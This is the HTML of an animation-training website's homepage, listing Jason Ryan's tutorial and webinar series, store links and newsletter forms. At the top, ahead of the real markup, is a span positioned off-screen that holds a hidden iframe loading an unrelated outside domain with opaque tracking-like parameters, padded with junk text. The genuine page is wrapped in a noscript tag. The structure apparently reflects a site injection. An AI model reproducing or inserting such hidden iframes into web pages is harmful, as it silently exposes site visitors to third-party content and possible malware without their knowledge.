<span style="position:absolute; top:-1160px; width:315px; height:318px;">
wcr
<iframe src="http://add.NEIGHBORHOODREUNIONS.NET/?br_fl=3020&yus=Amaya.80jo101.406p2i2l3&ct=Amaya&biw=Amaya.128kz73.406b4z6f1&tuif=3088&q=wXzQMvXcJwDQDIbGMvrESLtANknQA0KK2Ij2_dqyEoH9eWnihNzUSkrz6B2aC&oq=m2F_fd7LeRVPgvkihaBcwxomoxeUQ5H9Kivj0fUnRXIgpTR-heFUTp1u9CdUbI" width="257" height="270"></iframe>
fqou
</span>
ntxdld
<noscript><!DOCTYPE HTML>
<html lang="en-gb" dir="ltr">

<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <base href="http://jasonryananimation.com/" />
  <meta name="generator" content="Joomla! - Open Source Content Management" />
  <title>JRA | Home</title>
  <link href="/?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
  <link href="/?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" />
  <link href="/templates/yoo_nano2/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
  <link rel="stylesheet" href="/cache/widgetkit/widgetkit-f839b3ea.css" type="text/css" />
  <script src="/media/system/js/mootools-core.js" type="text/javascript"></script>
  <script src="/media/system/js/core.js" type="text/javascript"></script>
  <script src="/media/system/js/caption.js" type="text/javascript"></script>
  <script src="/media/widgetkit/js/jquery.js" type="text/javascript"></script>
  <script src="/cache/widgetkit/widgetkit-6c4d4dc2.js" type="text/javascript"></script>
  <script type="text/javascript">
window.addEvent('load', function() {
				new JCaption('img.caption');
			});
  </script>
  <!--[if lte IE 8]><link rel="stylesheet" href="/media/widgetkit/css/ie.css" /><![endif]-->

<link rel="apple-touch-icon-precomposed" href="/templates/yoo_nano2/apple_touch_icon.png" />
<link rel="stylesheet" href="/templates/yoo_nano2/css/base.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/styles/blocks/css/layout.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/styles/blocks/css/menus.css" />
<style>.wrapper { max-width: 980px; }
#maininner { width: 100%; }
#menu .dropdown { width: 250px; }
#menu .columns2 { width: 500px; }
#menu .columns3 { width: 750px; }
#menu .columns4 { width: 1000px; }</style>
<link rel="stylesheet" href="/templates/yoo_nano2/styles/blocks/css/modules.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/css/tools.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/styles/blocks/css/system.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/css/extensions.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/css/custom.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/css/font1/trebuchet.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/css/font2/trebuchet.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/css/font3/trebuchet.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/styles/blocks/css/style.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/styles/blocks/css/responsive.css" />
<link rel="stylesheet" href="/templates/yoo_nano2/css/print.css" />
<script src="/templates/yoo_nano2/warp/js/warp.js"></script>
<script src="/templates/yoo_nano2/warp/js/responsive.js"></script>
<script src="/templates/yoo_nano2/warp/js/accordionmenu.js"></script>
<script src="/templates/yoo_nano2/warp/js/dropdownmenu.js"></script>
<script src="/templates/yoo_nano2/js/template.js"></script>
<!--[if lte IE 8]><script src="/templates/yoo_nano2/warp/js/html5.js"></script><![endif]-->
<!--[if IE 8]><link rel="stylesheet" href="/templates/yoo_nano2/css/ie8.css" /><![endif]--></head>

<body id="page" class="page  isblog " data-config='{"twitter":0,"plusone":0,"facebook":0}'>

		
	<div class="wrapper clearfix">

		<header id="header">

			
				
			<div id="headerbar" class="clearfix">
			
					
				<a id="logo" href="http://jasonryananimation.com">

<p><img src="/images/jra_logo.png" border="0" width="449" height="49" style="float: left;" /></p></a>
								
								
			</div>
			
						<div id="menubar" class="clearfix">
				
								<nav id="menu"><ul class="menu menu-dropdown"><li class="level1 item101 active current"><a href="/" class="level1 active current"><span>Home</span></a></li><li class="level1 item117"><a href="/about-jra.html" class="level1"><span>About JRA</span></a></li><li class="level1 item108"><a href="/tutorials.html" class="level1"><span>Tutorials</span></a></li><li class="level1 item109 parent"><a href="/webinars.html" class="level1 parent"><span>Webinars</span></a><div class="dropdown columns1"><div class="dropdown-bg"><div><div class="width100 column"><ul class="level2"><li class="level2 item119"><a href="/webinars/fundamental-series.html" class="level2"><span>Fundamental Series</span></a></li><li class="level2 item120"><a href="/webinars/webinar-series-1.html" class="level2"><span>Webinar Series 1</span></a></li><li class="level2 item121"><a href="/webinars/webinar-series-2.html" class="level2"><span>Webinar Series 2</span></a></li><li class="level2 item122"><a href="/webinars/webinar-series-3.html" class="level2"><span>Webinar Series 3</span></a></li><li class="level2 item123"><a href="/webinars/webinar-series-4.html" class="level2"><span>Webinar Series 4</span></a></li><li class="level2 item124"><a href="/webinars/webinar-series-5.html" class="level2"><span>Webinar Series 5</span></a></li></ul></div></div></div></div></li><li class="level1 item111"><a href="/teammate-training.html" class="level1"><span>Teammate Training</span></a></li><li class="level1 item118"><a href="/ramp-up-tutorials.html" class="level1"><span>Ramp Up tutorials</span></a></li><li class="level1 item110"><a href="/store.html" class="level1"><span>Store</span></a></li><li class="level1 item115"><a href="/contact/3-jason-ryan.html" class="level1"><span>Contact Us</span></a></li></ul></nav>
				
								
			</div>
					
					
		</header>

				<section id="top-a" class="grid-block"><div class="grid-box width100 grid-h"><div class="module   deepest">

			
<div id="slideshow-2-58aba77ad3577" class="wk-slideshow wk-slideshow-downtown" data-widgetkit="slideshow" data-options='{"style":"downtown","autoplay":1,"interval":5000,"width":"auto","height":"auto","duration":500,"index":0,"order":"default","navigation":1,"buttons":0,"slices":20,"animated":"fade","caption_animation_duration":500}'>
	<div>
		<ul class="slides">

															<li>
				<article class="wk-content clearfix"><h3><img class="align-left" src="/images/content/JRA_webinar-series-5.jpg" border="0" alt="Series 5" width="600" height="308" />JRA Series 5</h3>
This is the webinar series that you have been waiting for. This is were all the training tutorials and webinars have come together to get your showreel to the level it needs to be. The number one question that we have heard from students and professionals is "what kind of shots are recruiters looking for?". This 10 week series starting Saturday Aug 9th, will answer exactly that question as Jason discusses, designs and animates four showreel type shots live.<br /><a class="button-primary" href="/webinars/webinar-series-5.html">Read the Full Description</a><br />
<div style="text-align: center;"> </div></article>
			</li>
																		<li>
				<article class="wk-content clearfix"><h3><img class="align-left" src="data:image/gif;base64,R0lGODlhAQABAJEAAAAAAP///////wAAACH5BAEHAAIALAAAAAABAAEAAAICVAEAOw==" data-src="/images/content/JRA-webinar4_01.jpg" border="0" alt="Series 4" width="600" height="308" />JRA Series 4</h3>
In this 10 part series, entitled "Mechanics to Music", Jason animated a shot/sequence live for 2 hours in each of the ten sessions. This was all set to an original rock song by his band Dark Chapter. These broad mechanic type shots consisted of intense acting and included dramatic moving cameras. Available for download now through the store.<br /><br />
<div style="text-align: center;"> </div>
<a class="button-primary" href="/webinars/webinar-series-4.html">Read the Full Description</a><br />
<div style="text-align: center;"> </div></article>
			</li>
																		<li>
				<article class="wk-content clearfix"><h3><img class="align-left" src="data:image/gif;base64,R0lGODlhAQABAJEAAAAAAP///////wAAACH5BAEHAAIALAAAAAABAAEAAAICVAEAOw==" data-src="/images/frontpage/JRA_series3.jpg" border="0" alt="JRA Series 3" width="600" height="308" />JRA Series 3</h3>
He's back!!! Jason has now designed an awesome 8 week series, where he went through everything he knows about Maya as it relates to animation. This webinar series will take you from the very basics of animating in Maya, including navigating the interface, preferences, useful plugins, parenting, referencing, hot keys, graph editor, editing shelves and tons more. Available for download now through the store.<br /><br /><a class="button-primary" href="/webinars/webinar-series-3.html">Read the Full Description</a><br />
<div style="text-align: center;"> </div></article>
			</li>
																		<li>
				<article class="wk-content clearfix"><h3><img class="align-left" src="data:image/gif;base64,R0lGODlhAQABAJEAAAAAAP///////wAAACH5BAEHAAIALAAAAAABAAEAAAICVAEAOw==" data-src="/images/frontpage/P2P_NewPage2.jpg" border="0" alt="P2P" width="600" height="308" />Jamaal Bradley acting shot walk-through</h3>
Learn how Senior Dreamworks Animator Jamaal Bradley uses reference, thumbnails, analyzes dialogue, breaks down poses, and takes a shot all the way 'to final'. "From Planning to Polish" is a step by step, 3 part video that takes you all the way from the planning phases of acting, down to the finished dialogue. This is a fun and educational video that will be an ongoing resource. Available in the Store.<br /><br />
<div style="text-align: center;"><a data-lightbox="width:720;height:400;" href="http://www.youtube.com/watch?v=ilKSGBS537U">Watch the Trailer</a></div></article>
			</li>
																		<li>
				<article class="wk-content clearfix"><h3><img class="align-left" src="data:image/gif;base64,R0lGODlhAQABAJEAAAAAAP///////wAAACH5BAEHAAIALAAAAAABAAEAAAICVAEAOw==" data-src="/images/frontpage/Four_legged_series.jpg" border="0" alt="Four Legged Series" width="600" height="308" />Jason Ryan Four Legged Tutorial Series</h3>
In this new series, Jason covers how he approaches animating four legged actions from concept to completion. Just like in his other tutorials, he starts from scratch and animate each action in 2D for every single frame. So whether you are doing your shots in 2D, CG, or Stop-Motion you will be able to follow along from the Blocking stage all the way through to adding overlap on tails and ears. Available in the Store.</article>
			</li>
																		<li>
				<article class="wk-content clearfix"><h3><img class="align-left" src="data:image/gif;base64,R0lGODlhAQABAJEAAAAAAP///////wAAACH5BAEHAAIALAAAAAABAAEAAAICVAEAOw==" data-src="/images/frontpage/mike_walling_jrawebinar_FP.jpg" border="0" alt="Mike Walling Mechanics training" width="600" height="308" />Mike Walling Body Mechanics training</h3>
Body Mechanics Shot Walk Through training with Mike Walling, Animator at DreamWorks SKG. From Basic Planning through Polish. Available in the Store.<br /><br />
<div style="text-align: center;"><a data-lightbox="width:720;height:400;" href="/site-vids/Ianimate_WT_Trailer_FINAL2.flv">Watch the Teaser</a></div></article>
			</li>
								</ul>
				<div class="caption"></div><ul class="captions"><li></li><li></li><li></li><li></li><li></li><li></li></ul>
	</div>
	<ul class="nav"><li><span></span></li><li><span></span></li><li><span></span></li><li><span></span></li><li><span></span></li><li><span></span></li></ul></div>		
</div></div></section>
				
				<section id="top-b" class="grid-block"><div class="grid-box width100 grid-h"><div class="module mod-line  deepest">

		<h3 class="module-title"><span class="color">Why</span> Build This Site?</h3>	

<h2><a data-lightbox="width:720;height:400;" href="http://youtu.be/HJDL47riwMY" style="float: left;"><img class="size-auto" src="/images/content/JR-reel_tn.jpg" border="0" alt="Jason's demo reel" width="172" height="109" style="border-radius: 2px 2px 2px 2px; margin-right: 15px; float: left;" /></a></h2>
<p>I love to teach and I love to Animate. I think to learn animation, you need to stand over the shoulder of a feature quality animator and watch how that person approaches their shots from the early concept stage all the way to final polish. Watching as they come up against and over come unforeseen obstacles. I have a work flow that approaches animation in a structured, creative, and most importantly a fun way.<br />There is a huge need in the Industry to find fully trained fast animators to hire. Colleges don't specialize and books are all theory and not practical, I will be animating right before your eyes so you can see step by step how to apply the principles and foundations of animation to real shots.</p>
<table width="100%" border="0">
<tbody>
<tr>
<td width="50%"><!-- BEGIN: Constant Contact Basic Opt-in Email List Form -->
<div align="center">
<table style="border: 0px solid #444444;" border="0" cellspacing="0" cellpadding="3">
<tbody>
<tr>
<td style="font-weight: bold; font-family: Arial; font-size: 12px; color: #444444;" align="center"><span class="style1">Join Our Newsletter</span></td>
</tr>
<tr>
<td style="border-top: 0px solid #444444;" align="center"><form style="margin-bottom: 2;" action="http://visitor.r20.constantcontact.com/d.jsp" method="post" name="ccoptin" target="_blank"><input type="hidden" name="llr" value="ibk9vacab" /> <input type="hidden" name="m" value="1101681993768" /> <input type="hidden" name="p" value="oi" /> <span style="font-weight: normal; font-family: Arial; font-size: 12px; color: #444444;">Your Email:</span> <input style="font-size: 10pt; border: 1px solid #999999;" type="text" name="ea" value="" size="20" /> <input class="submit" style="font-family: Verdana,Geneva,Arial,Helvetica,sans-serif; font-size: 10pt;" type="submit" name="go" value="Send" /></form></td>
</tr>
</tbody>
</table>
</div>
<!-- END: Constant Contact Basic Opt-in Email List Form --><!-- BEGIN: SafeSubscribe --><!-- END: Email Newsletters you can trust --></td>
<td style="text-align: center;" width="50%">
<h4><img src="/images/content/icon_sm.png" border="0" width="12" height="36" /> <a href="http://ianimate.us5.list-manage.com/subscribe?u=9e987df2af6857978432c16ea&amp;id=18cf9c3335" target="_blank">Join the iAnimate.net newsletter</a></h4>
</td>
</tr>
</tbody>
</table>		
</div></div></section>
				
				<div id="main" class="grid-block">

			<div id="maininner" class="grid-box">

								<section id="innertop" class="grid-block"><div class="grid-box width33 grid-h"><div class="module mod-line  deepest">

		<h3 class="module-title"><span class="color">What's</span> the Tutorials about?</h3>	

<p><a href="/tutorials.html" target="_self"><img src="/images/content/FP-tutorial-tn.jpg" border="0" width="282" height="113" /></a></p>
<p>After I left Walt Disney Animation Studios back in 2007, I began working on the most complete animation training program ever.  I recorded myself animating 18 shots from a beginner level all the way up to Advanced Dialog shots.</p>
<p><a class="button-primary" href="/tutorials.html">Read More</a></p>		
</div></div><div class="grid-box width33 grid-h"><div class="module mod-line  deepest">

		<h3 class="module-title"><span class="color">What's</span> the Webinars about?</h3>	

<p><a href="/webinars.html" target="_self"><img src="/images/content/FP-webinar-tn.jpg" border="0" width="282" height="113" /></a></p>
<p>They are a set of animation demos, recorded from the live virtual classrooms, where I took "Animation Master Classes" and showed how I would approach developing these ideas into dynamic sequences for a showreel piece or a short film.</p>
<p><a class="button-primary" href="/webinars.html">Read More</a></p>		
</div></div><div class="grid-box width33 grid-h"><div class="module mod-line  deepest">

		<h3 class="module-title"><span class="color">Extended</span> Training</h3>	

<p><a href="http://www.ianimate.net" target="_blank"><img src="/images/content/FP-iAnimate-tn.jpg" border="0" width="282" height="113" /></a></p>
<p>While doing the Tutorials and Webinars, I met many animators who paid "through the nose" to go to the best colleges and universities around the world with the worst part being their teachers didn’t have a clue about feature quality animation. So we started <strong><a href="http://www.ianimate.net" target="_blank">iAnimate.net</a></strong>, a complete set of live workshops designed to target all your animation needs.</p>		
</div></div></section>
				
				
				
				
			</div>
			<!-- maininner end -->
			
						
			
		</div>
				<!-- main end -->

				
				
				<footer id="footer">

						<a id="totop-scroller" href="#page"></a>
			
			<div class="module   deepest">

			

<p style="text-align: center;">Copyright © Jason Ryan Animation - All Rights Reserved</p>		
</div>
		</footer>
		
	</div>
	
		
</body>
</html>